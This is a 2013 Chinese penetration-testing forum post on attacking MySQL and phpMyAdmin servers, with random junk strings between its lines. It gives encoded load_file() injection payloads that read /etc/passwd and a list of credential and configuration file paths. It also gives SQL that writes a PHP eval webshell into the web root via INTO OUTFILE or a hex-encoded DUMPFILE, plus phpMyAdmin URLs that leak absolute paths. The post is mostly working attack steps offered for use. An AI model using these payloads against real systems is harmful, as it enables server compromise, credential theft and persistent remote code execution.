中国网络渗透测试联盟
标题:
利用load_file()获取敏感文件与phpmyadmin拿webshell
[打印本页]
作者:
admin
时间:
2013-7-13 19:27
标题:
利用load_file()获取敏感文件与phpmyadmin拿webshell
利用load_file()获取敏感文件与phpmyadmin拿webshell
" c) x# e! i2 U2 W4 i
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径: 1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20) 2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32)) 上面两个是查看一个PHP文件里
- ^' m0 F/ F7 o! T6 Z* |
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径:
4 D8 b' B, x9 V% t
0 c) L) }8 X2 Y3 d- n% _% c6 E
1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20)
6 ^! ~3 `- c' u g
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
R3 l# `7 R0 e& X
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 < 替换成空格 返回的是网页.而无法查看到代码.
# k3 W4 ? C& ?0 \
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
4 M: X, N+ g5 ]& m1 q
4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
, }; ?, d' e( `3 M& v
5、crogram FilesApache GroupApacheconf httpd.conf 或C:apacheconf httpd.conf 查看WINDOWS系统apache文件
5 i- z) j; a5 y" m5 h8 T( c. Z8 J
6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
1 {8 S6 M) B3 [& @" j
7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
& E! m D) n. k
8、d:APACHEApache2confhttpd.conf
7 f+ w4 S- j/ h
9、Crogram Filesmysqlmy.ini
9 J$ @" a5 D5 k& @4 M E
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
# d Y9 F* h6 l7 A5 ^- t$ Y/ W
11、 c:windowssystem32inetsrvMetaBase.xml 查看IIS的虚拟主机配置文件
( z" J- w7 }# P' n( B" ?
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
' v5 _3 T; p) e
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
" ?. q2 |+ _: p
14 、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
& @+ B6 B3 A, U7 X# c) M
15、 /etc/sysconfig/iptables 本看防火墙策略
) c# l' ]) H0 q" N1 G; `
16 、 usr/local/app/php5/lib/php.ini PHP 的相当设置
/ @ C1 s: B. L+ J: K
17 、/etc/my.cnf MYSQL的配置文件
2 ?/ D& h ^' W# a5 }
18、 /etc/redhat-release 红帽子的系统版本
7 f5 U" ^: M- o, C3 l( J2 H0 T
19 、C:mysqldatamysqluser.MYD 存在MYSQL系统中的用户密码
4 D1 @5 M# m, i
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
) B6 s5 Q5 j$ n3 [: S
21、/usr/local/app/php5/lib/php.ini //PHP相关设置
, Z$ P" k$ { O* m' X/ W3 D
22、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
9 R' K6 \9 E' K. T3 W' ^
23、crogram FilesRhinoSoft.comServ-UServUDaemon.ini
: n# O5 I* m! X. z/ h9 }
24、c:windowsmy.ini
3 T5 |4 g/ [0 B1 q
---------------------------------------------------------------------------------------------------------------------------------
! H6 c# m- b& L, @4 J+ g( b
1.如何拿到登陆密码. 自己想办法
+ {1 D8 c0 T5 b1 D1 z- k7 n
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
) {, B% `4 f0 H9 E5 G
3.选择一个Database.运行以下语句.
- u7 r5 ~7 x5 M+ f" r7 Z$ c9 b
----start code---
% m/ D' c: l9 i+ ]/ m) @8 N
Create TABLE a (cmd text NOT NULL);
- c5 h- S1 ` c }3 l) u3 R+ P& z
Insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');
8 O' t Z- \. B4 Q; {8 k
select cmd from a into outfile 'x:/phpMyAdmin/libraries/d.php';
+ s+ R: c. \$ R; g* s
Drop TABLE IF EXISTS a;
: f% p$ g [& [. v- g l
----end code---
2 U. L1 n) H3 o) q+ a
4.如果没什么意外.对应网站得到webshell
& h0 j! x5 j4 o# p! B7 c7 I$ u
思路与mssql一样,都是建个表,然后在表中插一句话木马,在导出到web目录!
* J$ s- {: W; I! c! I4 b
补充:还可以直接用dumpfile来得到shell
* X+ I2 w7 S8 H7 L
select 0x3c3f706870206576616c28245f504f53545b636d645d293f3e into DUMPFILE 'C:/XXX/php.php';
5 g( c# z) r1 F' P% Z U* ^5 t$ E
加密部分为 lanker 一句话 密码为 cmd
2 h+ p8 A! g9 Q8 Q
--------------------------------------------------------------------------------------------------------
$ N$ C+ B6 |7 T- N- w9 \
phpmyadmin的libraries目录多个文件存在绝对路径泄露漏洞- -
* m ~# ^ `8 Q) U. m
: _- b- | Q w- e- C5 {# t9 S
http://target/phpmyadmin/libraries/string.lib.php
$ t. I5 ~' ^- a% x& q
http://target/phpmyadmin/libraries/string.lib.php
" g: i) r2 a8 v; B6 S. Y3 x& d
http://target/phpmyadmin/libraries/database_interface.lib.php
2 `1 T- p5 w& Z* L/ Z! f
http://target/phpmyadmin/libraries/db_table_exists.lib.php
( R- b3 J1 o1 X$ D
http://target/phpmyadmin/libraries/display_export.lib.php
/ w5 n6 K, [" F. M4 l: J; I+ w$ Z
http://target/phpmyadmin/libraries/header_meta_style.inc.php
( M8 Q) y5 G. k6 m5 ?
http://target/phpmyadmin/libraries/mcrypt.lib.php
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2